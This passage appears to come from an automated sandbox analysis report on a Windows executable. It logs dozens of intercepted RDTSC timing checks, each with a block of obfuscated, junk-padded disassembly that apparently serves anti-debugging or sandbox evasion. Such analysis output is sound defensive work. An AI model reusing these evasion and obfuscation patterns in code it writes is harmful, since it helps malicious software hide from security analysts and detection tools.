                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008A4 second address: 4A00900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7704E143C3h 0x00000009 add esi, 3A1E3A5Eh 0x0000000f jmp 00007F7704E143C9h 0x00000014 popfd 0x00000015 jmp 00007F7704E143C0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ax, word ptr [ebx+6Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F7704E143BAh 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00900 second address: 4A00904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00904 second address: 4A0090A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0090A second address: 4A00976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d pushad 0x0000000e mov ax, DACDh 0x00000012 call 00007F7704DD53AAh 0x00000017 pop esi 0x00000018 popad 0x00000019 mov ax, word ptr [ebx+00000088h] 0x00000020 jmp 00007F7704DD53ADh 0x00000025 mov word ptr [esi+32h], ax 0x00000029 jmp 00007F7704DD53AEh 0x0000002e mov eax, dword ptr [ebx+0000008Ch] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F7704DD53B7h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00976 second address: 4A009C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d jmp 00007F7704E143BCh 0x00000012 push eax 0x00000013 mov edi, 7C9A8BB4h 0x00000018 pop edx 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+18h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7704E143C2h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009C4 second address: 4A009CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009CA second address: 4A009E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009E5 second address: 4A009E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009E9 second address: 4A009ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009ED second address: 4A009F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009F3 second address: 4A00A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7704E143C2h 0x00000009 jmp 00007F7704E143C5h 0x0000000e popfd 0x0000000f mov si, 3A27h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [ebx+1Ch] 0x00000019 jmp 00007F7704E143BAh 0x0000001e mov dword ptr [esi+3Ch], eax 0x00000021 pushad 0x00000022 movzx ecx, di 0x00000025 mov ah, dh 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+20h] 0x0000002b jmp 00007F7704E143C2h 0x00000030 mov dword ptr [esi+40h], eax 0x00000033 jmp 00007F7704E143C0h 0x00000038 lea eax, dword ptr [ebx+00000080h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A71 second address: 4A00A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A75 second address: 4A00A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A79 second address: 4A00A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A7F second address: 4A00A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A85 second address: 4A00A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A89 second address: 4A00A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A8D second address: 4A00AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007F7704DD53AAh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7704DD53AAh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00AB0 second address: 4A00AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00AB6 second address: 4A00ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00ABC second address: 4A00AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00AC0 second address: 4A00ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00ACF second address: 4A00AD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00AD5 second address: 4A00B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7704DD53B5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B04 second address: 4A00B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B14 second address: 4A00BBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7704DD53ADh 0x00000012 sbb si, ABD6h 0x00000017 jmp 00007F7704DD53B1h 0x0000001c popfd 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F7704DD53AEh 0x00000024 adc esi, 2263F9F8h 0x0000002a jmp 00007F7704DD53ABh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F7704DD53B8h 0x00000036 and ecx, 1AA3D458h 0x0000003c jmp 00007F7704DD53ABh 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 nop 0x00000045 jmp 00007F7704DD53B6h 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F7704DD53AEh 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C13 second address: 4A00C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F7704E143BEh 0x00000010 js 00007F7775212E39h 0x00000016 jmp 00007F7704E143C0h 0x0000001b mov eax, dword ptr [ebp-0Ch] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7704E143BCh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C68 second address: 4A00CDA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a mov dword ptr [esi+04h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7704DD53B6h 0x00000014 jmp 00007F7704DD53B5h 0x00000019 popfd 0x0000001a popad 0x0000001b lea eax, dword ptr [ebx+78h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F7704DD53AFh 0x00000027 or ah, 0000006Eh 0x0000002a jmp 00007F7704DD53B9h 0x0000002f popfd 0x00000030 push esi 0x00000031 pop edi 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CDA second address: 4A00D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7704E143C3h 0x00000009 or si, 9B7Eh 0x0000000e jmp 00007F7704E143C9h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7704E143C4h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D2F second address: 4A00D35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D35 second address: 4A00D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D3B second address: 4A00D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7704DD53B2h 0x00000010 adc eax, 659D0008h 0x00000016 jmp 00007F7704DD53ABh 0x0000001b popfd 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F7704DD53B6h 0x00000023 and ecx, 35B92268h 0x00000029 jmp 00007F7704DD53ABh 0x0000002e popfd 0x0000002f mov bl, al 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D9E second address: 4A00DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DA3 second address: 4A00DD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7704DD53ADh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DD0 second address: 4A00E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov ch, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-08h] 0x0000000d jmp 00007F7704E143C2h 0x00000012 nop 0x00000013 jmp 00007F7704E143C0h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7704E143BEh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E11 second address: 4A00E27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E27 second address: 4A00E2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E80 second address: 4A00EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7704DD53B7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00EB8 second address: 4A00EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00EBE second address: 4A00ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f mov cx, 906Bh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00ED2 second address: 4A00F8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7775212B88h 0x0000000f jmp 00007F7704E143BEh 0x00000014 mov eax, dword ptr [ebp-04h] 0x00000017 jmp 00007F7704E143C0h 0x0000001c mov dword ptr [esi+08h], eax 0x0000001f jmp 00007F7704E143C0h 0x00000024 lea eax, dword ptr [ebx+70h] 0x00000027 pushad 0x00000028 mov esi, 6A04035Dh 0x0000002d pushfd 0x0000002e jmp 00007F7704E143BAh 0x00000033 jmp 00007F7704E143C5h 0x00000038 popfd 0x00000039 popad 0x0000003a push 00000001h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jmp 00007F7704E143C3h 0x00000044 pushfd 0x00000045 jmp 00007F7704E143C8h 0x0000004a xor cx, BC78h 0x0000004f jmp 00007F7704E143BBh 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F8F second address: 4A00F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F95 second address: 4A0109B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushad 0x0000000e mov bh, ch 0x00000010 pushfd 0x00000011 jmp 00007F7704E143C7h 0x00000016 add cx, 419Eh 0x0000001b jmp 00007F7704E143C9h 0x00000020 popfd 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F7704E143C0h 0x00000028 xor si, 1B98h 0x0000002d jmp 00007F7704E143BBh 0x00000032 popfd 0x00000033 popad 0x00000034 push eax 0x00000035 jmp 00007F7704E143C9h 0x0000003a nop 0x0000003b jmp 00007F7704E143BEh 0x00000040 lea eax, dword ptr [ebp-18h] 0x00000043 jmp 00007F7704E143C0h 0x00000048 nop 0x00000049 jmp 00007F7704E143C0h 0x0000004e push eax 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F7704E143C1h 0x00000056 adc cx, CBF6h 0x0000005b jmp 00007F7704E143C1h 0x00000060 popfd 0x00000061 popad 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F7704E143C9h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0109B second address: 4A010A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010A1 second address: 4A010A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010DB second address: 4A010FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 77A2h 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test edi, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7704DD53B1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010FD second address: 4A011CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7775212953h 0x0000000f jmp 00007F7704E143BEh 0x00000014 mov eax, dword ptr [ebp-14h] 0x00000017 pushad 0x00000018 mov bx, si 0x0000001b mov di, ax 0x0000001e popad 0x0000001f mov ecx, esi 0x00000021 jmp 00007F7704E143C4h 0x00000026 mov dword ptr [esi+0Ch], eax 0x00000029 pushad 0x0000002a call 00007F7704E143BEh 0x0000002f mov dx, si 0x00000032 pop ecx 0x00000033 call 00007F7704E143C7h 0x00000038 pushfd 0x00000039 jmp 00007F7704E143C8h 0x0000003e adc si, BDB8h 0x00000043 jmp 00007F7704E143BBh 0x00000048 popfd 0x00000049 pop esi 0x0000004a popad 0x0000004b mov edx, 74E806ECh 0x00000050 jmp 00007F7704E143BFh 0x00000055 sub eax, eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007F7704E143C0h 0x0000005f pushad 0x00000060 popad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A011CC second address: 4A011F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7704DD53ADh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A011F4 second address: 4A0120F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0120F second address: 4A01264 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test eax, eax 0x00000009 pushad 0x0000000a push eax 0x0000000b movsx ebx, cx 0x0000000e pop eax 0x0000000f pushfd 0x00000010 jmp 00007F7704DD53B7h 0x00000015 sub ax, BCFEh 0x0000001a jmp 00007F7704DD53B9h 0x0000001f popfd 0x00000020 popad 0x00000021 jne 00007F77751D382Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx edx, si 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01264 second address: 4A01269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01269 second address: 4A012F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, E6h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b jmp 00007F7704DD53AFh 0x00000010 mov eax, dword ptr [esi] 0x00000012 pushad 0x00000013 call 00007F7704DD53B4h 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F7704DD53B7h 0x00000022 or cx, B9CEh 0x00000027 jmp 00007F7704DD53B9h 0x0000002c popfd 0x0000002d mov ah, 9Fh 0x0000002f popad 0x00000030 popad 0x00000031 mov dword ptr [edx], eax 0x00000033 pushad 0x00000034 mov si, ACEBh 0x00000038 popad 0x00000039 mov eax, dword ptr [esi+04h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F7704DD53ADh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012F3 second address: 4A01303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01303 second address: 4A0134E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+04h], eax 0x0000000b pushad 0x0000000c mov bx, 68C0h 0x00000010 pushfd 0x00000011 jmp 00007F7704DD53B9h 0x00000016 add ecx, 69C220C6h 0x0000001c jmp 00007F7704DD53B1h 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr [esi+08h] 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0134E second address: 4A013A4 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F7704E143C5h 0x0000000c popad 0x0000000d mov dword ptr [edx+08h], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7704E143BCh 0x00000017 or ecx, 1ECA93C8h 0x0000001d jmp 00007F7704E143BBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F7704E143C0h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013A4 second address: 4A013BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013BC second address: 4A013C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013C0 second address: 4A013C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013C4 second address: 4A013CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013CA second address: 4A01403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, AEh 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop edx 0x00000012 pushfd 0x00000013 jmp 00007F7704DD53B4h 0x00000018 and ax, AAE8h 0x0000001d jmp 00007F7704DD53ABh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01403 second address: 4A01409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01409 second address: 4A0140D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0140D second address: 4A01476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e jmp 00007F7704E143C6h 0x00000013 mov eax, dword ptr [esi+14h] 0x00000016 pushad 0x00000017 mov eax, 714A5B8Dh 0x0000001c pushfd 0x0000001d jmp 00007F7704E143BAh 0x00000022 xor ecx, 09D67FA8h 0x00000028 jmp 00007F7704E143BBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [edx+14h], eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7704E143C2h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0159F second address: 4A0161F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7704DD53AFh 0x00000009 or ax, 589Eh 0x0000000e jmp 00007F7704DD53B9h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+24h], eax 0x0000001c jmp 00007F7704DD53AAh 0x00000021 mov eax, dword ptr [esi+28h] 0x00000024 jmp 00007F7704DD53B0h 0x00000029 mov dword ptr [edx+28h], eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F7704DD53ACh 0x00000035 jmp 00007F7704DD53B5h 0x0000003a popfd 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0161F second address: 4A0165F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7704E143C0h 0x00000008 sbb ecx, 2277FF58h 0x0000000e jmp 00007F7704E143BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov esi, 13FE4C0Fh 0x0000001b popad 0x0000001c mov ecx, dword ptr [esi+2Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7704E143BCh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0165F second address: 4A01663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01663 second address: 4A01669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
